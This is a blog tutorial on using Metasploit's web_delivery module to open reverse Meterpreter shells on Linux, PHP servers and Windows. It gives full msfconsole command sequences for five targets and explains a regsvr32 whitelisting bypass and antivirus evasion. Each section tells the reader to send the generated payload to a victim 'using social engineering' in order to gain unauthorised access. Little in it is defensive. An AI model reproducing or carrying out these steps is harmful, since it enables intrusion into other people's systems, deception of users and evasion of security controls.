Hello
friends! In this article you will learn how to exploit three different platform
[Linux, windows, using single exploit of metasploit framework.
Requirement
Attacker:Kali Linux
Targeted platform:
Window,PHP,Linux[ubuntu]
Open the terminal in your kali Linux and type “msfconsole” to load metasploit
framework and execute given below exploit.
This module quickly fires up
a web server that serves a payload. The provided command which will allow for a
payload to download and execute. It will do it either specified scripting
language interpreter or "squiblydoo" via regsvr32.exe for bypassing
application whitelisting. The main purpose of this module is to quickly
establish a session on a target machine when the attacker has to manually type
in the command: e.g. Command Injection, RDP Session, Local Access or maybe
Remote Command Execution. This attack vector does not write to disk so it is
less likely to trigger AV solutions and will allow privilege escalations
supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe
to execute x86 payloads on x64 machines. Regsvr32 uses "squiblydoo"
technique for bypassing application whitelisting. The signed Microsoft binary
file, Regsvr32, is able to request an .sct file and then execute the included
PowerShell command inside of it. Both web requests (i.e., the .sct file and
PowerShell download/execute) can occur on the same port. "PSH
(Binary)" will write a file to the disk, allowing for custom binaries to
be served up to be downloaded/executed.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>show targets
From given below image you
can observe that there are 5 targets, which help you in generating malicious
code to create backdoor in victim system.
Exploit Linux platform [python]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost
192.168.1.132 (IP of Kali Linux)
msf exploit (web_delivery)>set lport
4444
msf exploit (web_delivery)>set target
0
msf exploit (web_delivery)>set payload
python/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we had set target 0 to generate malicious
code for python platform, from given below image you can observe the
highlighted malicious python code,
now copy it and send to victim using social engineering method.
As soon as victim will execute the malicious code in
terminal, attacker will obtain meterpreter session as unauthorized access of
victim system.
Exploit Web Server platform [PHP]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost
192.168.1.132 (IP of kali Linux)
msf exploit (web_delivery)>set lport
4444
msf exploit (web_delivery)>set target
1
msf exploit (web_delivery)>set payload
php/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
Now we had set target 1 to generate malicious code for php
platform, from given below image you can observe the highlighted malicious php code, now copy it and
send to victim using social engineering method.
As soon as victim will execute the malicious code in web
browser, attacker will obtain another meterpreter session as unauthorized
access of victim system.
Exploit Windows platform [exe]
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost
192.168.1.132
msf exploit (web_delivery)>set lport
4444
msf exploit (web_delivery)>set target
2
msf exploit (web_delivery)>set payload
windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
Further we had set target 2 to generate malicious code for
window platform, from given below image you can observe the highlighted malicious powershell.exe, now copy it
and send to victim using social engineering method.
As soon as victim will execute the malicious code in command
prompt, attacker will obtain meterpreter session as unauthorized access of
victim system.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost
192.168.1.132
msf exploit (web_delivery)>set lport
4444
msf exploit (web_delivery)>set target
3
msf exploit (web_delivery)>set payload
windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we had set target 3 to generate malicious
code for window platform, from given below image you can observe the
highlighted malicious dll code, now
copy it and send to victim using social engineering method.
As soon as victim will execute the malicious code as run
command inside RUN window, attacker will again obtain meterpreter session, and
make an unauthorized access in victim system.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost
192.168.1.132
msf exploit (web_delivery)>set lport
4444
msf exploit (web_delivery)>set target
4
msf exploit (web_delivery)>set payload
windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run
In this exploit we had set target 4 to generate malicious
code for windows platform, from given below image you can observe the
highlighted malicious powershell.exe
binary code, now copy it and send to victim using social engineering
method.
As soon as victim will execute the malicious code in command
prompt, attacker will obtain meterpreter session as unauthorized access of
victim system.
Hence a single exploit “web delivery script” is quite
helpful to hack three different platforms.
0 comments:
Post a Comment